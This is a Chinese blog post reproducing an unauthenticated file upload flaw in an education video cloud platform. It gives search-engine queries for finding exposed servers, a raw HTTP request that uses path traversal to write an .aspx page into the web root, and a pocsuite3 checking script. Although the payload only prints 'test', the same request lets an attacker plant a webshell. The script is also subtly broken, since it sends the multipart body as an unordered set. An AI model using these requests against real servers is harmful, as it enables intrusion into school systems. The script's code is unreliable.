漏洞复现-某教育视频云平台前台某接口文件上传漏洞(附漏洞检测脚本)

最新推荐文章于 2024-06-19 19:49:59 发布
最新推荐文章于 2024-06-19 19:49:59 发布
阅读量577 收藏 8
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/134859437
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

此教育视频云平台是一种教育技术解决方案,致力于提供高质量的在线教育视频服务。该平台为教育机构和教师提供了一个全面的视频管理和交流平台。它具有以下特点:首先,平台支持上传、存储和管理各种教育视频内容,包括课程录像、教学资源等。

fofa语句

body="Copyright © 2005-2018 广州市奥威亚电子科技有限公司"
body="/Upload/DomainInfo/MaxAVALogo.png"

poc语句加检测

POST /Tools/Video/VideoCover.aspx HTTP/1.1
Host: xxxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insectre-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;g=0.9
Cookie: ASP.NET_SessionId=pgfnw0patx4kh0jsnpjgzcmq; PrivateKey=f09020eaf656f9cf5d9292d39c296d1c
Connection: close
Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 294
 
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data, name= "file";filename="/../../../AVA.ResourcesPlatform.WebUI/test.aspx"
Content-Type: image/jpeg
 
<%@Page Language="C#"%>
<%
Response.Write("test");
%>
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

出现success说明上传成功,可到目标ip/test.aspx页面查看

poc脚本

脚本用的pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2023/12/7
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
 
class Education_cloud_platform_upload(POCBase):
    pocDesc = '''教育视频云平台文件上传漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-07'
    name = '教育视频云平台文件上传漏洞'
 
 
 
    def _verify(self):
 
        result = {}
        url = self.url+ '/Tools/Video/VideoCover.aspx'
        check_path = self.url+ "/test.aspx"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
            "Cookie": "ASP.NET_SessionId=d2adfopq0zkmjygoaov13pwh; PrivateKey=f09020eaf656f9cf5d9292d39c296d1c",
            "Content-Type": "image/jpeg"
        }
        path = "/Tools/Video/VideoCover.aspx"
        try:
            data = {'------WebKitFormBoundaryVBf7Cs8QWsfwC82M',
                   'Content-Disposition: form-data, name= "file";filename="/../../../AVA.ResourcesPlatform.WebUI/test.aspx"',
                   '<%@Page Language="C#"%>',
                   '<%Response.Write("test");%>',
                   '------WebKitFormBoundaryVBf7Cs8QWsfwC82M--'}
 
            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200:
                check_response = requests.get(check_path, headers=headers, verify=False)
                if check_response.status_code == 200 and 'test' in check_response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['path'] = path
 
            return self.parse_output(result)
        except Exception as e:
            pass
 
register_poc(Education_cloud_platform_upload)

脚本使用

炼金术师诸葛亮
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
奥威亚教学视频应用云平台 VideoCover任意文件上传漏洞复现
0xSec
12-10 1038
奥威亚教学视频应用云平台 VideoCover.aspx接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用上传后门文件达到获取服务器权限效果。
教培系统EduSoho任意文件读取漏洞
Arched的博客
02-01 572
教培系统EduSoho任意文件读取漏洞
复现】Edusoho cms任意文件读取漏洞_58
fushuang333的博客
02-25 548
复现】Edusoho cms任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
漏洞复现】EduSoho教培系统 任意文件读取漏洞复现
KKleeeaa的博客
02-01 488
任意文件读取
漏洞复现】奥威亚视屏云平台任意文件下载漏洞
weixin_45530380的博客
12-27 503
广州市奥威亚电子科技有限公司校园视频应用云平台存在任意文件下载漏洞,攻击者可利用该漏洞下载服务器上任意文件,获取敏感信息。app="AVA-教学视频应用云平台"
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
19、金蝶云星空CommonFileserver任意文件读取 20、用友NC/Cloud_Jsinvoke文件上传 21、用友GRP-U8_logs敏感信息泄露 22、飞企互联FE协作平台文件读取 23、启明星辰4A统一安全管控平台信息泄露 24、大华智慧园区综合...
智慧教育云平台建设解决方案-智慧校园云平台建设解决方案
01-09
智慧教育云平台建设解决方案--智慧校园云平台建设解决方案智慧教育云平台建设解决方案--智慧校园云平台建设解决方案智慧教育云平台建设解决方案--智慧校园云平台建设解决方案智慧教育云平台建设解决方案--智慧校园云...
互联网-智慧教育大数据云平台整体解决方案完整版.pptx
11-14
互联网-智慧教育大数据云平台整体解决方案完整版.pptx
互联网-智慧教育云平台解决方案完整版.pptx
11-14
互联网-智慧教育云平台解决方案完整版.pptx
互联网-智慧教育信息化云平台建设方案完整版.pptx
11-14
互联网-智慧教育信息化云平台建设方案完整版.pptx
漏洞复现】大华智慧园区前台任意文件上传
2201_75756681的博客
01-03 1229
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、 漏洞概述大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
漏洞复现-文件上传
hackzkaq的博客
11-06 125
在某次对某单位进行渗透测试时,遇到一个上传点,网站是java写的,但是上传jsp和jspx时会被waf拦截,但由于上传路径可控,经过不懈努力最终成果拿到shell,于是写这篇文章记录一下。目录中可以用来放置JSP的静态资源,在servlet3.0协议规范中,包含在jar文件 /META-INFO/resources/ 路径下的资源是可以直接访问的。目录通常是的一个特定目录,它用于存放与应用程序配置、安全性和资源管理相关的文件和目录,并且该目录下的资源文件无法直接通过浏览器访问。
H3C CVM 前台任意文件上传漏洞复现
0xSec
11-29 1194
H3C CVM/cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。
安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 432
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
前端开发之浏览器安全
最新发布
weixin_45511682的博客
06-19 814
浏览器安全,#XSS攻击、CSRF攻击、中间人攻击、前端安全问题与防范、网络劫持防范
NTFS安全权限
2302_80097039的博客
06-12 789
NTFS权限是基于。
SSL证书怎样配置部署更安全
2301_77689616的博客
06-19 110
可以考虑使用自动化的证书管理工具,如Certbot或Let's Encrypt,来自动化证书的颁发和更新过程,减少人为操作的疏漏。通过使用强大的加密算法、强制HTTPS、定期更新SSL证书、配置安全的服务器环境和进行安全的证书管理,可以帮助网站管理员更好地保护网站的安全。可以考虑使用证书管理工具来集中管理证书,定期检查证书的有效期和状态,以及证书的使用情况,确保证书的有效性和安全性。它通过建立安全的连接,确保网站的身份和保护用户的隐私,是网站安全的重要组成部分。5.进行安全的证书管理。
【RK3588/算能/Nvidia智能盒子】AI算法应用于中国生物疫苗生产过程智能监测,赋能生产安全,提升品质管控
YEYUANGEN的专栏
06-19 571
AI赋能医药疫苗安全生产,将被动“监督”变为主动“监控”,事前实时预警,事中常态监测,事后规范管理,实现车间作业标准化、人员行为可控化、决策分析层级化,真正做到疫苗生产过程的信息化管理。基于计算机视觉检测技术在疫苗生产过程中标准动作及流程监管方面拥有的巨大潜力,将深入药企生产的更多场景,研发更多优质实用的AI视觉算法,推动医药行业的智能化发展。,大大提高检测效率,有着传统人工目检不具备的优势,对食品药品生产过程的风险排查及质量管控提供了新的监管思路。等,实现疫苗生产中灭活剂添加流程的规范性监管。
shopxo download 任意文件读取漏洞
09-02
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。 要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实现此目标,例如: 1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。 2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。 3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。 一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。 为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施: 1. 及时更新shopxo系统以修复任何已知漏洞,并安装最新的补丁程序。 2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。 3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。 4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。 5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。 通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值